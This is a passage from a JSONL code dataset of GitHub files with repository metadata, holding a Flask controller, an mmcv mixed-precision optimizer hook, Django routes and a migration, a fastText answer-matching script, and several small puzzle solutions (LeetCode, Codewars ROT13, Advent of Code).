Result.ok(SysParamsService().page())\n\n\n@sys_params_controller.route(\"/\", methods=['GET'])\n@has_authority(\"sys:params:all\")\ndef info(id):\n return Result.ok(SysParamsService().info(id))\n\n\n@sys_params_controller.route(\"/\", methods=['POST'])\n@has_authority(\"sys:params:all\")\ndef save():\n data = request.json\n return Result.ok(SysParamsService().save(data))\n\n\n@sys_params_controller.route(\"/\", methods=['PUT'])\n@has_authority(\"sys:params:all\")\ndef update():\n data = request.json\n return Result.ok(SysParamsService().update(data))\n\n\n@sys_params_controller.route(\"/\", methods=['DELETE'])\n@has_authority(\"sys:params:all\")\ndef delete():\n data = request.json\n return Result.ok(SysParamsService().delete(data))\n","repo_name":"difffffft/flask-starter","sub_path":"controller/sys_params_controller.py","file_name":"sys_params_controller.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"1758966891","text":"import copy\n\nfrom torch.nn.utils import clip_grad\n\nfrom ..fp16_utils import allreduce_grads, wrap_fp16_model\nfrom .hook import HOOKS, Hook\n\n\n@HOOKS.register_module()\nclass OptimizerHook(Hook):\n\n def __init__(self, grad_clip=None):\n self.grad_clip = grad_clip\n\n def clip_grads(self, params):\n params = list(\n filter(lambda p: p.requires_grad and p.grad is not None, params))\n if len(params) > 0:\n return clip_grad.clip_grad_norm_(params, **self.grad_clip)\n\n def after_train_iter(self, runner):\n runner.optimizer.zero_grad()\n runner.outputs['loss'].backward()\n if self.grad_clip is not None:\n grad_norm = self.clip_grads(runner.model.parameters())\n if grad_norm is not None:\n # Add grad norm to the logger\n runner.log_buffer.update({'grad_norm': float(grad_norm)},\n runner.outputs['num_samples'])\n runner.optimizer.step()\n\n\n@HOOKS.register_module()\nclass Fp16OptimizerHook(OptimizerHook):\n \"\"\"FP16 optimizer hook.\n\n The steps of fp16 optimizer is as follows.\n 1. Scale the loss value.\n 2. BP in the fp16 model.\n 2. Copy gradients from fp16 model to fp32 weights.\n 3. Update fp32 weights.\n 4. Copy updated parameters from fp32 weights to fp16 model.\n\n Refer to https://arxiv.org/abs/1710.03740 for more details.\n\n Args:\n loss_scale (float): Scale factor multiplied with loss.\n \"\"\"\n\n def __init__(self,\n grad_clip=None,\n coalesce=True,\n bucket_size_mb=-1,\n loss_scale=512.,\n distributed=True):\n self.grad_clip = grad_clip\n self.coalesce = coalesce\n self.bucket_size_mb = bucket_size_mb\n self.loss_scale = loss_scale\n self.distributed = distributed\n\n def before_run(self, runner):\n \"\"\"Preparing steps before Mixed Precision Training.\n\n 1. Make a master copy of fp32 weights for optimization.\n 2. Convert the main model from fp32 to fp16.\n \"\"\"\n # keep a copy of fp32 weights\n runner.optimizer.param_groups = copy.deepcopy(\n runner.optimizer.param_groups)\n # convert model to fp16\n wrap_fp16_model(runner.model)\n\n def copy_grads_to_fp32(self, fp16_net, fp32_weights):\n \"\"\"Copy gradients from fp16 model to fp32 weight copy.\"\"\"\n for fp32_param, fp16_param in zip(fp32_weights, fp16_net.parameters()):\n if fp16_param.grad is not None:\n if fp32_param.grad is None:\n fp32_param.grad = fp32_param.data.new(fp32_param.size())\n fp32_param.grad.copy_(fp16_param.grad)\n\n def copy_params_to_fp16(self, fp16_net, fp32_weights):\n \"\"\"Copy updated params from fp32 weight copy to fp16 model.\"\"\"\n for fp16_param, fp32_param in zip(fp16_net.parameters(), fp32_weights):\n fp16_param.data.copy_(fp32_param.data)\n\n def after_train_iter(self, runner):\n \"\"\"Backward optimization steps for Mixed Precision Training.\n\n 1. Scale the loss by a scale factor.\n 2. Backward the loss to obtain the gradients (fp16).\n 3. Copy gradients from the model to the fp32 weight copy.\n 4. Scale the gradients back and update the fp32 weight copy.\n 5. Copy back the params from fp32 weight copy to the fp16 model.\n \"\"\"\n # clear grads of last iteration\n runner.model.zero_grad()\n runner.optimizer.zero_grad()\n # scale the loss value\n scaled_loss = runner.outputs['loss'] * self.loss_scale\n scaled_loss.backward()\n # copy fp16 grads in the model to fp32 params in the optimizer\n fp32_weights = []\n for param_group in runner.optimizer.param_groups:\n fp32_weights += param_group['params']\n self.copy_grads_to_fp32(runner.model, fp32_weights)\n # allreduce grads\n if self.distributed:\n allreduce_grads(fp32_weights, self.coalesce, self.bucket_size_mb)\n # scale the gradients back\n for param in fp32_weights:\n if param.grad is not None:\n param.grad.div_(self.loss_scale)\n if self.grad_clip is not None:\n self.clip_grads(fp32_weights)\n # update fp32 params\n runner.optimizer.step()\n # copy fp32 params to the fp16 model\n self.copy_params_to_fp16(runner.model, fp32_weights)\n","repo_name":"Tessellate-Imaging/Monk_Object_Detection","sub_path":"18_mmaction/lib/mmcv/mmcv/runner/hooks/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","stars":608,"dataset":"github-code","pt":"16"} +{"seq_id":"23844684550","text":"from django.urls import path, re_path\nfrom blog import views\n\n\napp_name = 'blog'\nurlpatterns = [\n\n #Example: /blog/\n path('',views.PostLV.as_view(), name= 'index'),\n\n #/blog/tag/\n path('tag/', views.TagCloudTV.as_view(), name='tag_cloud'),\n path('tagforeign/', views.ForeignTagCloudTV.as_view(), name='tag_cloud_foreign'),\n\n #/blog/tag/tagname/\n path('tag//', views.TaggedObjectLV.as_view(), name='tagged_object_list'),\n path('tagforeign//', views.ForeignTaggedObjectLV.as_view(), name='tagged_object_list_foreign'),\n #Example: /blog/post/ (same as /blog/)\n path('post/', views.PostLV.as_view(), name='post_list'),\n\n #/blog/post/django-example/\n path('post/', views.PostDV.as_view(), name='post_detail'),\n\n path('search/', views.SearchFormView.as_view(), name='search'),\n\n path('add/',views.PostCreateView.as_view(), name=\"add\",),\n path('change/', views.PostChangeLV.as_view(), name=\"change\",),\n \n path('update//', views.PostUpdateView.as_view(), name=\"update\",),\n path('/delete/', views.PostDeleteView.as_view(), name=\"delete\",),\n path('comment//delete/', views.CommentDeleteView.as_view(), name=\"comment_delete\",),\n re_path(r'^owner/(?P[-\\w]+)/(?P[-\\w\\s]+)$', views.PostUserLV.as_view(), name=\"post_user\",),\n \n #인기글\n path('popular/', views.PostPopularLV.as_view(), name='popular_index'),\n path('popular/', views.PostPopularDV.as_view(), name='post_popular_detail'),\n path('blogpostpopular-like/', views.PostPopularLike, name=\"blogpost_popular_like\"),\n #좋아요 눌렀을 때 가는 곳\n path('blogpost-like/', views.PostLike, name=\"blogpost_like\"),\n] ","repo_name":"alstjr0307/Web_StockStorage","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5216437244","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\n@author: wushaohong\n@time: 2021/4/8 上午10:35\n\"\"\"\n\"\"\"547. 省份数量\n有 n 个城市,其中一些彼此相连,另一些没有相连。如果城市 a 与城市 b 直接相连,且城市 b 与城市 c 直接相连,那么城市 a 与城市 c 间接相连。\n\n省份 是一组直接或间接相连的城市,组内不含其他没有相连的城市。\n\n给你一个 n x n 的矩阵 isConnected ,其中 isConnected[i][j] = 1 表示第 i 个城市和第 j 个城市直接相连,\n而 isConnected[i][j] = 0 表示二者不直接相连。\n\n返回矩阵中 省份 的数量。\n\n示例 1:\n\n输入:isConnected = [[1,1,0],[1,1,0],[0,0,1]]\n输出:2\n示例 2:\n\n\n输入:isConnected = [[1,0,0],[0,1,0],[0,0,1]]\n输出:3\n \n\n提示:\n\n1 <= n <= 200\nn == isConnected.length\nn == isConnected[i].length\nisConnected[i][j] 为 1 或 0\nisConnected[i][i] == 1\nisConnected[i][j] == isConnected[j][i]\"\"\"\n\n\nclass Solution:\n def findCircleNum(self, isConnected) -> int:\n def dfs(cur_, target):\n print(cur_, target)\n for i, n in enumerate(isConnected[target]):\n if isConnected[target][i] and i not in cur_:\n cur_.add(i)\n dfs(cur_, i)\n\n num = len(isConnected)\n visited = set()\n res = 0\n for i in range(num):\n if i not in visited:\n print(i, visited)\n cur = {i}\n dfs(cur, i)\n visited.update(cur)\n res += 1\n return res\n\n\nif __name__ == '__main__':\n sol = Solution()\n print(sol.findCircleNum([[1, 1, 0], [1, 1, 0], [0, 0, 1]]))\n","repo_name":"hshrimp/letecode_for_me","sub_path":"letecode/481-600/541-560/547.py","file_name":"547.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"33711556232","text":"\"\"\"\nROT13 is a simple letter substitution cipher that replaces a letter with the letter 13 letters after it in the alphabet. ROT13 is an example of the Caesar cipher.\n\nCreate a function that takes a string and returns the string ciphered with Rot13. If there are numbers or special characters included in the string,\nthey should be returned as they are. Only letters from the latin/english alphabet should be shifted, like in the original Rot13 \"implementation\".\n\nPlease note that using encode is considered cheating.\n\"\"\"\n\n\n\n# MY VERSION\ndef rot13(message):\n alphabet = 'abcdefghijklmnopqrstuvwxyz'\n newWord = []\n\n for i in message:\n if i.lower() not in alphabet:\n newWord.append(i)\n elif message[message.index(i)].isupper():\n newWord.append(alphabet[(alphabet.find(i.lower()) + 13) % len(alphabet)].upper())\n else:\n newWord.append(alphabet[(alphabet.find(i) + 13) % len(alphabet)])\n\n return ''.join(newWord[newWord.index(c)] for c in newWord)\n \n \n# SOMEONE'S CODE (BEST WAY)\n\"\"\"\nimport string\nfrom codecs import encode as _dont_use_this_\nfrom string import maketrans, lowercase, uppercase\n\ndef rot13(message):\n lower = maketrans(lowercase, lowercase[13:] + lowercase[:13])\n upper = maketrans(uppercase, uppercase[13:] + uppercase[:13])\n return message.translate(lower).translate(upper)\n\"\"\"\n","repo_name":"eddshine/Code-Wars","sub_path":"rot13.py","file_name":"rot13.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3254698349","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport supervise.models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('fishuser', '0001_initial'),\n ('general', '0001_initial'),\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Edit',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('user', models.OneToOneField(related_name='supervise_user_profile', verbose_name='\\u5e33\\u865f', to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Error',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('context', models.CharField(max_length=1024, verbose_name='\\u7f3a\\u5931\\u5167\\u5bb9')),\n ('improve_result', models.TextField(null=True, verbose_name='\\u6539\\u5584\\u5c0d\\u7b56\\u53ca\\u7d50\\u679c')),\n ('date', models.DateField(null=True, verbose_name='\\u532f\\u5165\\u65e5\\u671f')),\n ('memo', models.TextField(null=True, verbose_name='\\u5099\\u8a3b')),\n ],\n options={\n 'verbose_name': '\\u7f3a\\u5931\\u9805\\u76ee',\n 'verbose_name_plural': '\\u7f3a\\u5931\\u9805\\u76ee',\n },\n ),\n migrations.CreateModel(\n name='ErrorContent',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('no', models.CharField(max_length=64, verbose_name='\\u7f3a\\u5931\\u7de8\\u865f')),\n ('introduction', models.TextField(verbose_name='\\u7f3a\\u5931\\u8aaa\\u660e')),\n ],\n ),\n migrations.CreateModel(\n name='ErrorImprovePhoto',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('before', models.ImageField(null=True, upload_to=supervise.models._ERROR_FILE_UPLOAD_TO)),\n ('before_memo', models.TextField(null=True, verbose_name='\\u6539\\u5584\\u524d\\u8aaa\\u660e')),\n ('middle', models.ImageField(null=True, upload_to=supervise.models._ERROR_FILE_UPLOAD_TO)),\n ('middle_memo', models.TextField(null=True, verbose_name='\\u6539\\u5584\\u4e2d\\u8aaa\\u660e')),\n ('after', models.ImageField(null=True, upload_to=supervise.models._ERROR_FILE_UPLOAD_TO)),\n ('after_memo', models.TextField(null=True, verbose_name='\\u6539\\u5584\\u5f8c\\u8aaa\\u660e')),\n ],\n ),\n migrations.CreateModel(\n name='ErrorLevel',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(unique=True, max_length=4, verbose_name='\\u7f3a\\u5931\\u7a0b\\u5ea6')),\n ],\n options={\n 'verbose_name': '\\u7f3a\\u5931\\u7a0b\\u5ea6',\n 'verbose_name_plural': '\\u7f3a\\u5931\\u7a0b\\u5ea6',\n },\n ),\n migrations.CreateModel(\n name='ErrorPhotoFile',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('upload_date', models.DateField(verbose_name='\\u4e0a\\u50b3\\u65e5\\u671f')),\n ('ext', models.CharField(max_length=10, null=True, verbose_name='\\u526f\\u6a94\\u540d')),\n ('name', models.CharField(default=b'', max_length=256, null=True, verbose_name='\\u6a94\\u6848\\u540d')),\n ('file', models.ImageField(null=True, upload_to=supervise.models._FILE_UPLOAD_TO)),\n ('memo', models.CharField(max_length=2048, null=True, verbose_name='\\u5099\\u8a3b\\u8aaa\\u660e')),\n ],\n ),\n migrations.CreateModel(\n name='Guide',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=24, verbose_name='\\u59d3\\u540d')),\n ],\n options={\n 'verbose_name': '\\u7763\\u5c0e\\u4eba\\u54e1',\n 'verbose_name_plural': '\\u7763\\u5c0e\\u4eba\\u54e1',\n },\n ),\n migrations.CreateModel(\n name='Option',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('swarm', models.CharField(max_length=128, verbose_name='\\u7fa4')),\n ('value', models.CharField(max_length=128, verbose_name='\\u9078\\u9805')),\n ],\n options={\n 'verbose_name': '\\u9078\\u9805',\n 'verbose_name_plural': '\\u9078\\u9805',\n },\n ),\n migrations.CreateModel(\n name='PCC_Project',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('uid', models.CharField(unique=True, max_length=255, verbose_name='\\u6a19\\u6848\\u7de8\\u865f')),\n ('implementation_department', models.CharField(max_length=255, null=True, verbose_name='\\u57f7\\u884c\\u6a5f\\u95dc')),\n ('name', models.CharField(max_length=255, null=True, verbose_name='\\u6a19\\u6848\\u540d\\u7a31')),\n ('s_public_date', models.DateField(null=True, verbose_name='\\u9810\\u5b9a\\u516c\\u544a\\u65e5\\u671f')),\n ('r_decide_tenders_date', models.DateField(null=True, verbose_name='\\u5be6\\u969b\\u6c7a\\u6a19\\u65e5\\u671f')),\n ('contract_budget', models.FloatField(null=True, verbose_name='\\u767c\\u5305\\u9810\\u7b97')),\n ('decide_tenders_price', models.FloatField(null=True, verbose_name='\\u6c7a\\u6a19\\u91d1\\u984d')),\n ('year', models.IntegerField(null=True, verbose_name='\\u5e74\\u5ea6')),\n ('month', models.IntegerField(null=True, verbose_name='\\u6708\\u4efd')),\n ('percentage_of_predict_progress', models.FloatField(null=True, verbose_name='\\u9810\\u5b9a\\u9032\\u5ea6')),\n ('percentage_of_real_progress', models.FloatField(null=True, verbose_name='\\u5be6\\u969b\\u9032\\u5ea6')),\n ('percentage_of_dulta', models.FloatField(null=True, verbose_name='\\u5dee\\u7570')),\n ],\n ),\n migrations.CreateModel(\n name='SuperviseCase',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('uid', models.CharField(max_length=255, null=True, verbose_name='\\u6a19\\u6848\\u7de8\\u865f')),\n ('date', models.DateField(verbose_name='\\u7763\\u5c0e\\u65e5\\u671f')),\n ('plan', models.CharField(max_length=512, verbose_name='\\u5217\\u7ba1\\u8a08\\u756b\\u540d\\u7a31')),\n ('project', models.CharField(max_length=512, verbose_name='\\u6a19\\u6848\\u540d\\u7a31')),\n ('project_organizer_agencies', models.CharField(max_length=512, verbose_name='\\u6a19\\u6848\\u4e3b\\u8fa6\\u6a5f\\u95dc')),\n ('project_manage_unit', models.CharField(max_length=128, verbose_name='\\u5c08\\u6848\\u7ba1\\u7406\\u55ae\\u4f4d')),\n ('designer', models.CharField(max_length=128, verbose_name='\\u8a2d\\u8a08\\u55ae\\u4f4d')),\n ('inspector', models.CharField(max_length=128, verbose_name='\\u76e3\\u9020\\u55ae\\u4f4d')),\n ('construct', models.CharField(max_length=512, verbose_name='\\u627f\\u5305\\u5546')),\n ('budget_price', models.DecimalField(null=True, verbose_name='\\u9810\\u7b97\\u91d1\\u984d(\\u5343\\u5143)', max_digits=16, decimal_places=3)),\n ('contract_price', models.DecimalField(null=True, verbose_name='\\u5951\\u7d04\\u91d1\\u984d(\\u5343\\u5143)', max_digits=16, decimal_places=3)),\n ('contract_price_change', models.DecimalField(null=True, verbose_name='\\u5951\\u7d04\\u91d1\\u984d(\\u5343\\u5143)\\u8b8a\\u66f4\\u5f8c', max_digits=16, decimal_places=3)),\n ('info', models.TextField(verbose_name='\\u5de5\\u7a0b\\u6982\\u8981')),\n ('progress_date', models.DateField(null=True, verbose_name='\\u9032\\u5ea6\\u7d00\\u9304\\u65e5\\u671f')),\n ('scheduled_progress', models.DecimalField(null=True, verbose_name='\\u5de5\\u7a0b\\u9810\\u8a08\\u7d2f\\u8a08\\u9032\\u5ea6', max_digits=16, decimal_places=4)),\n ('actual_progress', models.DecimalField(null=True, verbose_name='\\u5de5\\u7a0b\\u5be6\\u969b\\u7d2f\\u8a08\\u9032\\u5ea6', max_digits=16, decimal_places=4)),\n ('scheduled_money', models.DecimalField(null=True, verbose_name='\\u5de5\\u7a0b\\u9810\\u5b9a\\u7d2f\\u8a08\\u91d1\\u984d(\\u5343\\u5143)', max_digits=16, decimal_places=3)),\n ('actual_money', models.DecimalField(null=True, verbose_name='\\u5de5\\u7a0b\\u5be6\\u969b\\u7d2f\\u8a08\\u91d1\\u984d(\\u5343\\u5143)', max_digits=16, decimal_places=3)),\n ('progress_info', models.TextField(null=True, verbose_name='\\u76ee\\u524d\\u65bd\\u5de5\\u6982\\u6cc1')),\n ('start_date', models.DateField(null=True, verbose_name='\\u958b\\u5de5\\u65e5\\u671f')),\n ('expected_completion_date', models.DateField(null=True, verbose_name='\\u9810\\u8a08\\u5b8c\\u5de5\\u65e5\\u671f')),\n ('expected_completion_date_change', models.DateField(null=True, verbose_name='\\u9810\\u8a08\\u5b8c\\u5de5\\u65e5\\u671f\\u8b8a\\u66f4\\u5f8c')),\n ('score', models.DecimalField(verbose_name='\\u7763\\u5c0e\\u5206\\u6578', max_digits=5, decimal_places=2)),\n ('merit', models.TextField(verbose_name='\\u512a\\u9ede')),\n ('advise', models.TextField(verbose_name='\\u5efa\\u8b70\\u4e8b\\u9805(\\u898f\\u5283\\u8a2d\\u8a08\\u554f\\u984c)')),\n ('advise_improve_result', models.TextField(null=True, verbose_name='\\u6539\\u5584\\u5c0d\\u7b56\\u53ca\\u7d50\\u679c')),\n ('advise_date', models.DateField(null=True, verbose_name='\\u6539\\u5584\\u65e5\\u671f')),\n ('advise_memo', models.TextField(null=True, verbose_name='\\u5099\\u8a3b')),\n ('other_advise', models.TextField(verbose_name='\\u5efa\\u8b70\\u4e8b\\u9805(\\u5176\\u4ed6\\u5efa\\u8b70)')),\n ('other_improve_result', models.TextField(null=True, verbose_name='\\u6539\\u5584\\u5c0d\\u7b56\\u53ca\\u7d50\\u679c')),\n ('other_date', models.DateField(null=True, verbose_name='\\u6539\\u5584\\u65e5\\u671f')),\n ('other_memo', models.TextField(null=True, verbose_name='\\u5099\\u8a3b')),\n ('cdate', models.DateField(verbose_name='\\u532f\\u5165\\u65e5\\u671f')),\n ('inspector_deduction', models.IntegerField(default=0, verbose_name='\\u76e3\\u9020\\u6263\\u9ede')),\n ('construct_deduction', models.IntegerField(default=0, verbose_name='\\u71df\\u9020\\u6263\\u9ede')),\n ('organizer_deduction', models.IntegerField(default=0, verbose_name='\\u4e3b\\u8fa6\\u6263\\u9ede')),\n ('project_manage_deduction', models.IntegerField(default=0, verbose_name='\\u5c08\\u6848\\u7ba1\\u7406\\u6263\\u9ede')),\n ('test', models.TextField(verbose_name='\\u6aa2\\u9a57\\u62c6\\u9a57')),\n ('captain', models.ManyToManyField(related_name='captain_set', verbose_name=b'\\xe9\\xa0\\x98\\xe9\\x9a\\x8a', to='supervise.Guide')),\n ('fes_project', models.ForeignKey(verbose_name='\\u5c0d\\u61c9FES\\u7cfb\\u7d71\\u5de5\\u7a0b\\u6848', to='fishuser.Project', null=True)),\n ('inguide', models.ManyToManyField(related_name='inguide_set', verbose_name=b'\\xe5\\x85\\xa7\\xe8\\x81\\x98\\xe5\\xa7\\x94\\xe5\\x93\\xa1', to='supervise.Guide')),\n ('location', models.ForeignKey(related_name='location_set', verbose_name='\\u5730\\u9ede', to='general.Place', null=True)),\n ('outguide', models.ManyToManyField(related_name='outguide_set', verbose_name=b'\\xe5\\xa4\\x96\\xe8\\x81\\x98\\xe5\\xa7\\x94\\xe5\\x93\\xa1', to='supervise.Guide')),\n ('place', models.ForeignKey(related_name='place_set', verbose_name='\\u7e23\\u5e02', to='general.Place')),\n ('subordinate_agencies_unit', models.ForeignKey(verbose_name='\\u6a19\\u6848\\u6240\\u5c6c\\u5de5\\u7a0b\\u4e3b\\u7ba1\\u6a5f\\u95dc', to='general.Unit', null=True)),\n ('worker', models.ManyToManyField(related_name='worker_set', verbose_name=b'\\xe5\\xb7\\xa5\\xe4\\xbd\\x9c\\xe4\\xba\\xba\\xe5\\x93\\xa1', to='supervise.Guide')),\n ],\n ),\n migrations.AlterUniqueTogether(\n name='option',\n unique_together=set([('swarm', 'value')]),\n ),\n migrations.AddField(\n model_name='errorphotofile',\n name='supervisecase',\n field=models.ForeignKey(verbose_name='\\u7763\\u5c0e\\u6848', to='supervise.SuperviseCase'),\n ),\n migrations.AddField(\n model_name='errorimprovephoto',\n name='case',\n field=models.ForeignKey(to='supervise.SuperviseCase', null=True),\n ),\n migrations.AddField(\n model_name='errorimprovephoto',\n name='error',\n field=models.ForeignKey(to='supervise.Error', null=True),\n ),\n migrations.AddField(\n model_name='errorimprovephoto',\n name='improve_type',\n field=models.ForeignKey(verbose_name='\\u6539\\u5584\\u5c0d\\u5411swarm=\"error_improve_type\"', to='supervise.Option', null=True),\n ),\n migrations.AddField(\n model_name='error',\n name='case',\n field=models.ForeignKey(to='supervise.SuperviseCase'),\n ),\n migrations.AddField(\n model_name='error',\n name='ec',\n field=models.ForeignKey(to='supervise.ErrorContent'),\n ),\n migrations.AddField(\n model_name='error',\n name='level',\n field=models.ForeignKey(to='supervise.ErrorLevel'),\n ),\n ]\n","repo_name":"farhanhs/fes","sub_path":"apps/supervise/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":14211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42618186672","text":"from tqdm import tqdm\nimport ujson as json\nimport subprocess\nfrom scipy.spatial import distance\nimport os\nimport csv\n\n_num = 1500\n\nopt1 = []\nopt2 = []\nopt3 = []\nopt4 = []\nindexing = []\n\nhome = os.path.expanduser(\"~\")\nfile = os.path.join(\"kgb\", \"0622.json\")\n\nwith open(file, \"r\") as fh:\n source = json.load(fh)\n for _id in range(len(source)):\n options = source[_id]['options']\n opt1.append(options[0].replace(\"''\", '\" ').replace(\"``\", '\" '))\n opt2.append(options[1].replace(\"''\", '\" ').replace(\"``\", '\" '))\n opt3.append(options[2].replace(\"''\", '\" ').replace(\"``\", '\" '))\n opt4.append(options[3].replace(\"''\", '\" ').replace(\"``\", '\" '))\n indexing.append(source[_id][\"id\"])\n\nwith open('kgb/opt1.csv', 'w') as f:\n s = csv.writer(f,delimiter=',',lineterminator='\\n')\n for i in range(_num): \n s.writerow([opt1[i].replace('\\n','')])\nwith open('kgb/opt2.csv', 'w') as f:\n s = csv.writer(f,delimiter=',',lineterminator='\\n')\n for i in range(_num): \n s.writerow([opt2[i].replace('\\n','')])\nwith open('kgb/opt3.csv', 'w') as f:\n s = csv.writer(f,delimiter=',',lineterminator='\\n')\n for i in range(_num): \n s.writerow([opt3[i].replace('\\n','')])\nwith open('kgb/opt4.csv', 'w') as f:\n s = csv.writer(f,delimiter=',',lineterminator='\\n')\n for i in range(_num): \n s.writerow([opt4[i].replace('\\n','')])\n\nos.system('cat kgb/kgb_answer.csv | ./../../fastText-0.1.0/fasttext print-sentence-vectors \\\n\t\t\t\t\t\t /home/geneping/corpus/advdl/wiki_zh_model.bin > kgb/ans_emb.txt')\nos.system('cat kgb/opt1.csv | ./../../fastText-0.1.0/fasttext print-sentence-vectors \\\n\t\t\t\t\t\t /home/geneping/corpus/advdl/wiki_zh_model.bin > kgb/opt1_emb.txt')\nos.system('cat kgb/opt2.csv | ./../../fastText-0.1.0/fasttext print-sentence-vectors \\\n\t\t\t\t\t\t /home/geneping/corpus/advdl/wiki_zh_model.bin > kgb/opt2_emb.txt')\nos.system('cat kgb/opt3.csv | ./../../fastText-0.1.0/fasttext print-sentence-vectors \\\n\t\t\t\t\t\t /home/geneping/corpus/advdl/wiki_zh_model.bin > kgb/opt3_emb.txt')\nos.system('cat kgb/opt4.csv | ./../../fastText-0.1.0/fasttext print-sentence-vectors \\\n\t\t\t\t\t\t /home/geneping/corpus/advdl/wiki_zh_model.bin > kgb/opt4_emb.txt')\n\nf = open('kgb/ans_emb.txt','r')\nans = f.readlines()\nf = open('kgb/opt1_emb.txt','r')\nopt1 = f.readlines()\nf = open('kgb/opt2_emb.txt','r')\nopt2 = f.readlines()\nf = open('kgb/opt3_emb.txt','r')\nopt3 = f.readlines()\nf = open('kgb/opt4_emb.txt','r')\nopt4 = f.readlines()\n\n\nf = open('kgb/final_ans.csv', 'w')\ns = csv.writer(f,delimiter=',',lineterminator='\\n')\ns.writerow(['ID','Answer'])\nfor i in range(_num):\n\ta = ans[i].split(' ')[-301:-1]\n\tq = opt1[i].split(' ')[-301:-1]\n\tw = opt2[i].split(' ')[-301:-1]\n\te = opt3[i].split(' ')[-301:-1]\n\tr = opt4[i].split(' ')[-301:-1]\n\ta = list(map(float, a))\n\tq = list(map(float, q))\n\tw = list(map(float, w))\n\te = list(map(float, e))\n\tr = list(map(float, r))\n\tqq = distance.cosine(a, q)\n\tww = distance.cosine(a, w)\n\tee = distance.cosine(a, e)\n\trr = distance.cosine(a, r)\n\tvalues = [qq,ww,ee,rr]\n\tchoice = values.index(min(values)) + 1\n\ts.writerow([indexing[i], choice])\nf.close()","repo_name":"r06944010/delta-qanet","sub_path":"get_opt.py","file_name":"get_opt.py","file_ext":"py","file_size_in_byte":3131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4181806846","text":"#!/usr/bin/env python3\n\"\"\"\nDay 6 of Advent of Code 2017\nhttp://adventofcode.com/2017/day/6\n\"\"\"\nimport operator\nfrom typing import Dict, List, Set\n\n\ndef count_cycles(sequence: List[int]) -> int:\n \"\"\"Count the number of redistribution cycles.\n\n Count the number of redistribution cycles before we encounter\n input that we've previously seen.\n \"\"\"\n cycles = 0\n all_unique_memory = True\n seen: Set[str] = set()\n\n while all_unique_memory:\n # find the maximum value, and the index.\n max_idx, max_value = max(enumerate(sequence), key=operator.itemgetter(1))\n\n # zero the max_value\n sequence[max_idx] = 0\n\n # iterate through this value and add one to each other value\n redist_start_idx = (max_idx+1) % len(sequence)\n\n for _ in range(max_value):\n sequence[redist_start_idx] += 1\n\n redist_start_idx = (redist_start_idx+1) % len(sequence)\n\n cycles += 1\n\n str_sequence = ''.join((str(s) for s in sequence))\n\n if str_sequence not in seen:\n seen.add(str_sequence)\n else:\n break\n\n return cycles\n\n\ndef count_cycle_length(sequence: List[int]) -> int:\n \"\"\"Count the length of the loop in the cycle.\"\"\"\n cycle = cycle_length = 0\n all_unique_memory = True\n seen: Dict[str, int] = {}\n\n while all_unique_memory:\n # find the maximum value, and the index.\n max_idx, max_value = max(enumerate(sequence), key=operator.itemgetter(1))\n\n # zero the max_value\n sequence[max_idx] = 0\n\n # iterate through this value and add one to each other value\n redist_start_idx = (max_idx+1) % len(sequence)\n\n for _ in range(max_value):\n sequence[redist_start_idx] += 1\n\n redist_start_idx = (redist_start_idx+1) % len(sequence)\n\n str_sequence = ''.join((str(s) for s in sequence))\n\n if str_sequence not in seen:\n seen[str_sequence] = cycle\n else:\n cycle_length = cycle - seen[str_sequence]\n break\n\n cycle += 1\n\n return cycle_length\n\n\nif __name__ == '__main__':\n with open('data/day06.txt', 'rt') as f:\n data = [int(x) for x in f.read().split('\\t')]\n\n assert count_cycles([0, 2, 7, 0]) == 5\n assert count_cycle_length([0, 2, 7, 0]) == 4\n\n print(count_cycles(data))\n print(count_cycle_length(data))\n","repo_name":"matthewmckenna/advent2017","sub_path":"day06.py","file_name":"day06.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1246000033","text":"# ***Repeat with while***\ncount = 1\nwhile count <= 5:\n print(count)\n count += 1\n\n# ***Cancelling with break***\nwhile True:\n text = input(\"String to capitalize [type q to quit]: \")\n if text == 'q':\n break\n print(text.capitalize())\n\n# ***Skip ahead with continue***\n# this is a simple program that squares an input if odd\n# returns an 